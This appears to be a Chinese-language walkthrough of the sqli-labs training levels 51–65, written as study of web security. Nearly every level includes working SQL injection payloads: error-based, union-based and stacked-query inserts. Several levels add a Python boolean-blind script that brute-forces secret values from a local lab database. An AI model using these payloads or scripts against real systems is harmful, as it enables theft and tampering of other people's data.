Less-51:
首先打开题目测试发现是’闭合,并且能报错和Less-47一样直接报错注入
1' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)-- dsa
获取username的值:
Less-52:
发现能打堆叠注入:
插入数据:
?sort=1;insert into users(id,username,password) values('17','hack','123456')-- da
发现我们插入的hack数据成功
Less-53:
发现和52一样但是没有报错信息,就打堆叠注入,是’闭合:
插入数据hack1
?sort=1';insert into users(id,username,password) values('18','hack1','123456')-- da
Less-54:
打开题目得到:
题目意思:
此挑战的目标是在不到10次的尝试中,仅从数据库的随机表(“挑战”)中转储(密钥)
为了好玩,每次重置,挑战都会产生随机的表名、列名和表数据。随时保持新鲜。
所以我们尝试注入发现是’闭合的union注入:
获取到数据库
?id=-1' union select 1,database(),3-- ad
进一步获取表:
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad
获取表的列:
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='y3c6wljhoj'),3-- ad
获取secret_HWX6的值提交:
?id=-1' union select 1,(select group_concat(secret_HWX6) from y3c6wljhoj),3-- ad
提交key:
Less-55:
发现和Less-54一样但是是)闭合:
获取数据库:
?id=-1) union select 1,database(),3-- ad
获取表名:
?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad
获取列名:
?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='k5fh2qgiut'),3-- ad
获取secret的值:
?id=-1) union select 1,(select group_concat(secret_2ICN) from k5fh2qgiut),3-- ad
提交key:
Less-56:
和上一题一样但是’)闭合
获取数据库:
?id=-1') union select 1,database(),3-- ad
获取表名:
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad
获取列名:
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='k092nxgyt2'),3-- ad
获取secret的值:
?id=-1') union select 1,(select group_concat(secret_ZEE5) from k092nxgyt2),3-- ad
提交key:
Less-57:
发现与上一题一样,但是是"闭合
获取表,列方法一样
获取secret的值:
?id=-1" union select 1,(select group_concat(secret_RNUQ) from a0mg9eh2ot),3-- ad
提交key:
Less-58:
发现 ’ 报错,和上面一样这里用报错注入
获取表,列用报错注入方法和上几题报错注入的一样
获取secret的值:
?id='and updatexml(1,concat(0x7e,(select group_concat(secret_JG7L) from 8ef31gojep),0x7e),1) -- asd
提交key:
Less-59:
发现和Less-58一样,但是整型闭合
获取secret的值:
?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_OUQ8) from sswc0q9fky),0x7e),1) -- asd
提交key:
Less-60:
发现和Less-59一样,但是 ") 闭合
获取secret的值:
?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_GNZC) from 2xfjxrn4jr),0x7e),1) -- asd
提交key:
Less-61:
发现和Less-60一样,但是 ')) 闭合
获取secret的值:
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_QC5B) from vcyf8g5w12),0x7e),1) -- asd
提交key:
Less-62:
发现布尔判断,没有报错,但是 ') 闭合,不能用报错注入
union注入也不行
因为源码对输出的用户、密码进行了限制
所以利用布尔盲注
首先判断数据库长度:
发现当数据库长度大于10时没有回显,大于9是有回显Angelina
判断数据库长度为10,判断标准是Angelina
编写python脚本:
import requests
url = 'http://127.0.0.1/sqli/Less-62/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')
while True:
m += 1 #长度
over = str #判断结束标志
for code in range(1,256):
#获取数据库:f"1') and (ord(substr(database(),{m},1))={code})-- da"
#获取表:f"1') and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
#获取列:f"1') and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='vcyf8g5w12'),{m},1))={code})-- da"
#获取值: f"1') and (ord(substr((select group_concat(secret_QC5B) from vcyf8g5w12),{m},1))={code})-- da"
payload = f"1') and (ord(substr((select group_concat(secret_QC5B) from vcyf8g5w12),{m},1))={code})-- da"
html = requests.get(url+payload)
sign = html.text
if 'Angelina' in sign:
str += chr(code)
print(f'{chr(code)}',end='')
if over == str:
break
print()
print(f'[*]爆破结果:{str}')
获取secret的值:
提交key:
Less-63
发现和less62一样,但是 ’ 闭合
python脚本:
import requests
url = 'http://127.0.0.1/sqli/Less-63/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')
while True:
m += 1 #长度
over = str #判断结束标志
for code in range(1,256):
#获取数据库:f"1' and (ord(substr(database(),{m},1))={code})-- da"
#获取表:f"1' and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
#获取列:f"1' and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='nfzptrb2e3'),{m},1))={code})-- da"
#获取值: f"1' and (ord(substr((select group_concat(secret_CKD1) from nfzptrb2e3),{m},1))={code})-- da"
payload = f"1' and (ord(substr((select group_concat(secret_CKD1) from nfzptrb2e3),{m},1))={code})-- da"
html = requests.get(url+payload)
sign = html.text
if 'Angelina' in sign:
str += chr(code)
print(f'{chr(code)}',end='')
if over == str:
break
print()
print(f'[*]爆破结果:{str}')
获取secret的值:
提交key:
Less-64
发现和less63一样,但是 )) 闭合
python脚本:
import requests
url = 'http://127.0.0.1/sqli/Less-64/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')
while True:
m += 1 #长度
over = str #判断结束标志
for code in range(1,256):
#获取数据库:f"1)) and (ord(substr(database(),{m},1))={code})-- da"
#获取表:f"1)) and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
#获取列:f"1)) and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qzqoywa5dj'),{m},1))={code})-- da"
#获取值: f"1)) and (ord(substr((select group_concat(secret_C3YJ) from qzqoywa5dj),{m},1))={code})-- da"
payload = f"1)) and (ord(substr((select group_concat(secret_C3YJ) from qzqoywa5dj),{m},1))={code})-- da"
html = requests.get(url+payload)
sign = html.text
if 'Angelina' in sign:
str += chr(code)
print(f'{chr(code)}',end='')
if over == str:
break
print()
print(f'[*]爆破结果:{str}')
获取secret的值:
提交key:
Less-65
发现和less64一样,但是 1") 闭合
python脚本:
import requests
url = 'http://127.0.0.1/sqli/Less-65/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')
while True:
m += 1 #长度
over = str #判断结束标志
for code in range(1,256):
#获取数据库:f"1\") and (ord(substr(database(),{m},1))={code})-- da"
#获取表:f"1\") and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
#获取列:f"1\") and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='7qaeec6nuf'),{m},1))={code})-- da"
#获取值: f"1\") and (ord(substr((select group_concat(secret_WKXE) from 7qaeec6nuf),{m},1))={code})-- da"
payload = f"1\") and (ord(substr((select group_concat(secret_WKXE) from 7qaeec6nuf),{m},1))={code})-- da"
html = requests.get(url+payload)
sign = html.text
if 'Angelina' in sign:
str += chr(code)
print(f'{chr(code)}',end='')
if over == str:
break
print()
print(f'[*]爆破结果:{str}')
获取secret的值:
提交key:
剩下的题目发现是:
看源码
发现到Less-65就结束了